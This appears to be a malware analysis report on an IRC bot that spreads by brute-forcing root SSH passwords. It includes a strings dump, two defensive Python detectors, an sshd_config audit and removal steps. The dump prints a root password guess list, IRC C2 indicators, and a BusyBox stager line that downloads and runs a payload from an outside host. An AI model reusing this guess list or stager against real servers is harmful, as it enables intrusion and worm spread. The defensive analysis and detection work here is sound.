CLSID={645FF040-5081-101B-9F08-00AA002F954E}\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
http://www.whatismyip.com
http://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
passwd
01010101
10101010
rootwebmaster
rootwebadmin
ftpuserftpuser
mysqlmysql
pgsqlpgsql
webweb
webmasterwebmaster
ftpserver
webserver
ftpftp
webadmin
webadmin1
webmaster
0987654321
1234567890
monkey1
PaSsWoRd
69696969
mypass
12341234
7654321
87654321
monkey
password1
newpass
systempass
%s %s: SSH USELESS: root@%s %s .
%s %s: SSH WIN: root@%s %s .
password
%s %s: SSH LOL: root:%s@%s .
BusyBox Instructed: %s.
./1.jpg
chmod +x 1.jpg
test ! -e 1.jpg && busybox wget http://www.e-qacs.com/1.jpg
wget http://www.e-qacs.com/1.jpg
BusyBox Fail@ShellOpen: %s.
BusyBox Fail@PtyOpen: %s.
BusyBox Fail@ChannelOpen: %s.
Setting local Banner: %s
Setting Callback %d
Unable to ask for ssh-userauth service
Would block asking for ssh-userauth service
ssh-userauth
Unable to exchange encryption keys
Would block exchanging encryption keys
session_startup for socket %d
Received Banner: %s
SSH-2.0-libssh2_1.0
Disconnecting: reason=%d, desc=%s, lang=%s
Setting blocking mode on session %d
Invalid descriptor passed to libssh2_poll()
Permitted auth methods: %s
ssh-connection
Unable to send userauth-password-change request
Unable to allocate memory for userauth-password-change request
Password expired, and callback failed
Password Expired, and no callback specified
Password authentication successful
Password change required
Unable to send userauth-password request
Attempting to login using password authentication
Unable to allocate memory for userauth-password request
Invalid signature for supplied public key, or bad username/public key combination
Invalid key data, not base64 encoded
Invalid public key data
Missing public key data
Unable to read public key from file
Unable to allocate memory for public key data
Invalid data in public key file
Unable to open public key file
Loading public key file: %s
Unable to initialize private key from file
No handler for specified private key
Loading private key file: %s
Publickey authentication successful
Attempting publickey authentication -- phase 2
Failed allocating additional space for userauth-publickey packet
Username/PublicKey combination invalid
Pubkey authentication prematurely successful
Unable to send userauth-publickey request
Attempting publickey authentication
publickey
Keyboard-interactive authentication successful
Unable to send userauth-keyboard-interactive request
Unable to allocate memory for keyboard-interactive prompt message
Unable to allocate memory for keyboard-interactive response packet
Keyboard-interactive response callback function invoked
Unable to allocate memory for keyboard-interactive responses array
Unable to allocate memory for keyboard-interactive prompts array
Unable to allocate memory for keyboard-interactive 'instruction' request field
Unable to allocate memory for keyboard-interactive 'name' request field
Unable to send keyboard-interactive request
Attempting keyboard-interactive authentication
keyboard-interactive
Unable to allocate memory for keyboard-interactive authentication
Opening Channel - win %d pack %d
direct-tcpip
Unable to allocate memory for direct-tcpip connection
Requesting direct-tcpip session to from %s:%d to %s:%d
Dynamic tcpip-forward port allocated: %d
0.0.0.0
tcpip-forward
Requesting tcpip-forward session for %s:%d
cancel-tcpip-forward
Cancelling tcpip-forward session for %s:%d
Setting remote environment variable: %s=%s on channel %lu/%lu
Requesting x11-req for channel %lu/%lu: single=%d proto=%s cookie=%s screen=%d
starting request(%s) on channel %lu/%lu, message=%s
Flushing %d bytes of data from stream %lu on channel %lu/%lu
Setting channel %lu/%lu handle_extended_data mode to %d
Reading %d of buffered data from %lu/%lu/%d
Attempting to read %d bytes from channel %lu/%lu stream #%d
libssh2_packet_write returned EAGAIN
Sending %d bytes on channel %lu/%lu, stream_id=%d
Splitting write block due to %lu byte packet_size on %lu/%lu/%d
Splitting write block due to %lu byte window_size on %lu/%lu/%d
Writing %d bytes on channel %lu/%lu, stream #%d
libssh2_channel_wait_closed() invoked when channel is not in EOF state
Renegotiating Keys
Unable to allocate memory for LIBSSH2_PACKET
X11 Connection Received from %s:%ld on channel %lu
Remote received connection from %s:%ld to %s:%ld
forwarded-tcpip
Ignoring extended data and refunding %d bytes
Debug Packet: %s
Disconnect(%d): %s(%s)
Packet type %d received, length=%d
Looking for packet of type: %d
May block until packet of type %d becomes available
Redirecting into the key re-exchange
Initiating Diffie-Hellman Group1 Key Exchange
Server to Client HMAC Key calculated
Client to Server HMAC Key calculated
Server to Client IV and Key calculated
Client to Server IV and Key calculated
Received NEWKEYS message
Timed out waiting for NEWKEYS
Unable to send NEWKEYS message
Sending NEWKEYS message
Unable to verify hostkey signature
Unable to initialize hostkey importer
Unable to allocate memory for a copy of the host key
Burnt packet of type: x
Sending KEX packet %d
Initiating Diffie-Hellman Group14 Key Exchange
Unrecoverable error exchanging keys
Agreed on COMP_SC method: %s
Agreed on COMP_CS method: %s
Agreed on MAC_SC method: %s
Agreed on MAC_CS method: %s
Agreed on CRYPT_SC method: %s
Agreed on CRYPT_CS method: %s
Agreed on HOSTKEY method: %s
Agreed on KEX method: %s
The requested method(s) are not currently supported
ssh-dss
ssh-rsa
[email protected]
[email protected]
?456789:;<=
!"#$%&'()*+,-./0123
zcÁ
%System%.exe
192.168.1.120
SC// Random Port Scan started on 108.x.x.x:22 with a delay of 10 seconds for 0 minutes using 60 threads.
EFTP// Server started, Port: 16759, File: %System%.exe.
"%local server IP%"
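The IRC strings above are enough to recognise this bot's command-and-control session on the wire: the fixed "USER blaze * 0 :%s" registration line, the "{%s-%s-%s-%s-%s}" and "{iNF-%s-%s-%s-%s-%s}" nick formats, the PASS/JOIN/PONG/PRIVMSG commands, the #sshscan2 and #sshchannel2 channels and the underirc.sytes.net C2 host. The following is an added example written for this page, not code from the report or from the malware: it scores each source host in a constructed flow log against those indicators and flags hosts that show at least two independent ones. The log format, the C2 and peer IP addresses and every sample line are assumptions made for the example.

```python
"""Score IRC sessions for the Blazebot C2 traits seen in the strings dump.

Added example for this page; not code from the Lavasoft report or from the
malware.  The indicators are taken from the strings above; the log format,
the C2 IP addresses and the sample lines are constructed.
"""
import re
from collections import defaultdict

# Indicators from the strings dump.
C2_HOST = "underirc.sytes.net"
C2_CHANNELS = {"#sshscan2", "#sshchannel2"}
# "USER blaze * 0 :%s" - fixed ident "blaze", and "* 0" is the reverse of the
# "0 *" mode/unused order that most real clients send.
USER_RE = re.compile(r"^USER blaze \* 0 :")
# "{%s-%s-%s-%s-%s}" and "{iNF-%s-%s-%s-%s-%s}": five dash-separated fields in braces.
NICK_RE = re.compile(r"^NICK \{(?:iNF-)?[^{}\s-]+(?:-[^{}\s-]+){4}\}$")
JOIN_RE = re.compile(r"^JOIN (#\S+)")

# Constructed log format: "<ts> <src:port> <dst:port> <dns|irc> <payload>" per line.
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (dns|irc) (.*)$")

WEIGHTS = {"c2_host": 3, "user_blaze": 3, "c2_channel": 3, "nick_format": 2}
THRESHOLD = 5  # at least two independent indicators from the same source host


def score_sessions(lines):
    """Return {src_ip: {"score": n, "reasons": [...]}} for hosts at or above THRESHOLD."""
    hits = defaultdict(lambda: {"score": 0, "reasons": []})

    def add(src_ip, reason, detail):
        hits[src_ip]["score"] += WEIGHTS[reason]
        hits[src_ip]["reasons"].append(f"{reason}: {detail}")

    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip it rather than abort the sweep
        _ts, src, _dst, kind, payload = m.groups()
        src_ip = src.rsplit(":", 1)[0]
        if kind == "dns":
            if payload.rstrip(".").lower() == C2_HOST:  # strings show it with a trailing dot
                add(src_ip, "c2_host", payload)
        elif USER_RE.match(payload):
            add(src_ip, "user_blaze", payload)
        elif NICK_RE.match(payload):
            add(src_ip, "nick_format", payload)
        else:
            j = JOIN_RE.match(payload)
            if j and j.group(1).lower() in C2_CHANNELS:
                add(src_ip, "c2_channel", payload)
    return {ip: h for ip, h in hits.items() if h["score"] >= THRESHOLD}


# Constructed sample: the analysed host (192.168.1.120, from the strings) talking to
# an assumed C2 at 203.0.113.10, plus a benign IRC user on another host.
SAMPLE_LOG = """\
2014-04-30T19:31:40 192.168.1.120:1041 192.168.1.1:53 dns underirc.sytes.net.
2014-04-30T19:31:41 192.168.1.120:1042 203.0.113.10:6667 irc PASS secret
2014-04-30T19:31:41 192.168.1.120:1042 203.0.113.10:6667 irc NICK {USA-XP-1a2b-3c4d-5e6f}
2014-04-30T19:31:41 192.168.1.120:1042 203.0.113.10:6667 irc USER blaze * 0 :blaze
2014-04-30T19:31:42 192.168.1.120:1042 203.0.113.10:6667 irc JOIN #sshscan2 key
2014-04-30T19:31:50 192.168.1.50:50123 198.51.100.7:6667 irc NICK alice
2014-04-30T19:31:50 192.168.1.50:50123 198.51.100.7:6667 irc USER alice 0 * :Alice
2014-04-30T19:31:51 192.168.1.50:50123 198.51.100.7:6667 irc JOIN #python
"""

if __name__ == "__main__":
    for ip, hit in score_sessions(SAMPLE_LOG.splitlines()).items():
        print(ip, hit["score"], *hit["reasons"], sep="\n  ")
```

The nick format alone is deliberately weighted below the threshold: braces and dashes are unusual but not unique to this family, whereas the "blaze" ident, the named channels and the C2 host each identify it on their own.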
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate the malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3272
system32.exe:3300
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\8LQCYG2J.txt (119 bytes)
%Documents and Settings%\%current user%\Cookies\N8VWP5L8.txt (119 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Data Serivce" = "system32.exe" (the misspelling is the malware's own value name; match it literally)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
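The strings dump also records how the bot spreads beyond the infected Windows host: it port-scans random 22/tcp ranges (the sample swept 108.x.x.x:22 with 60 threads and a 10 second delay), guesses root's password from the built-in list, logs "SSH WIN: root@%s" on success, and then issues "test ! -e 1.jpg && busybox wget http://www.e-qacs.com/1.jpg", "chmod +x 1.jpg" and "./1.jpg" over the libssh2 session. The added example below is written for this page (not the report's or the malware's code) and shows what a defender on the Linux side of that behaviour can check: a run of failed root password logins followed by an accept from the same source in OpenSSH's auth log, the stager command sequence in a command audit trail, and whether sshd_config still permits root password logins at all. The auth-log line format is OpenSSH's; the exec-log format, the sshd_config fragments, the host names and every sample line are constructed for the example.

```python
"""Linux-side checks for the SSH spreading stage described by the strings dump.

Added example for this page; not the report's or the malware's code.  The
sshd log format is OpenSSH's; the exec-log format, the sshd_config fragments
and all sample lines are constructed.
"""
import re
from collections import defaultdict

SSHD_RE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)
# The download-and-run sequence the bot issues after "SSH WIN" (from the strings).
STAGER_RES = [
    re.compile(r"\bwget\s+http://www\.e-qacs\.com/1\.jpg\b"),
    re.compile(r"\bchmod\s+\+x\s+1\.jpg\b"),
    re.compile(r"(^|\s)\./1\.jpg\b"),
]
MIN_FAILURES = 3  # failed root logins from one source before a later accept is suspicious


def brute_force_wins(auth_lines):
    """Return {src_ip: failures_seen_before_accept} for sources that guessed root's password."""
    failures = defaultdict(int)
    wins = {}
    for line in auth_lines:
        m = SSHD_RE.search(line)
        if not m:
            continue  # publickey logins, disconnects, etc. are not password events
        outcome, user, src = m.groups()
        if user != "root":
            continue  # the bot only tries root (see "SSH WIN: root@%s")
        if outcome == "Failed":
            failures[src] += 1
        elif failures[src] >= MIN_FAILURES:
            wins[src] = failures[src]
    return wins


def stager_hits(exec_lines):
    """Return the exec-log lines matching any step of the BusyBox stager sequence."""
    return [line for line in exec_lines if any(r.search(line) for r in STAGER_RES)]


def audit_sshd_config(config_text):
    """Report whether sshd_config still allows what the bot needs: root + password auth.

    Absent directives take the permissive defaults of OpenSSH releases before 7.0
    (PermitRootLogin yes, PasswordAuthentication yes).  sshd honours the first value
    it sees for a directive; Match blocks are out of scope for this example.
    """
    defaults = {"permitrootlogin": "yes", "passwordauthentication": "yes"}
    found = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line.lower().startswith("match "):
            break
        parts = line.split(None, 1)
        if len(parts) == 2:
            key = parts[0].lower()
            if key in defaults and key not in found:
                found[key] = parts[1].strip().lower()
    settings = {**defaults, **found}
    settings["root_password_login"] = (
        settings["permitrootlogin"] == "yes" and settings["passwordauthentication"] == "yes"
    )
    return settings


# Constructed samples.  203.0.113.22 stands in for a scanning bot; the strings show the
# sample sweeping 108.x.x.x:22 with 60 threads and a 10 second delay.
AUTH_LOG = """\
Apr 30 19:35:01 web1 sshd[4101]: Failed password for root from 203.0.113.22 port 41000 ssh2
Apr 30 19:35:12 web1 sshd[4103]: Failed password for root from 203.0.113.22 port 41001 ssh2
Apr 30 19:35:23 web1 sshd[4105]: Failed password for root from 203.0.113.22 port 41002 ssh2
Apr 30 19:35:34 web1 sshd[4107]: Accepted password for root from 203.0.113.22 port 41003 ssh2
Apr 30 19:36:00 web1 sshd[4120]: Failed password for invalid user admin from 198.51.100.9 port 5022 ssh2
Apr 30 19:36:05 web1 sshd[4122]: Accepted publickey for deploy from 10.0.0.8 port 50122 ssh2
"""
EXEC_LOG = """\
Apr 30 19:35:36 web1 root: test ! -e 1.jpg && busybox wget http://www.e-qacs.com/1.jpg
Apr 30 19:35:37 web1 root: chmod +x 1.jpg
Apr 30 19:35:37 web1 root: ./1.jpg
Apr 30 19:40:00 web1 deploy: ls -la /var/www
"""
WEAK_SSHD_CONFIG = "PermitRootLogin yes\nPasswordAuthentication yes\n"
HARDENED_SSHD_CONFIG = "PermitRootLogin no\nPasswordAuthentication no\nPubkeyAuthentication yes\n"

if __name__ == "__main__":
    print("root password guessed from:", brute_force_wins(AUTH_LOG.splitlines()))
    print("stager commands:", *stager_hits(EXEC_LOG.splitlines()), sep="\n  ")
    print("weak config:", audit_sshd_config(WEAK_SSHD_CONFIG))
    print("hardened config:", audit_sshd_config(HARDENED_SSHD_CONFIG))
```

The "weak" configuration is exactly what the password list above is built for; with PermitRootLogin set to no (or prohibit-password) the guessing stage cannot succeed regardless of the root password, and the stager never runs.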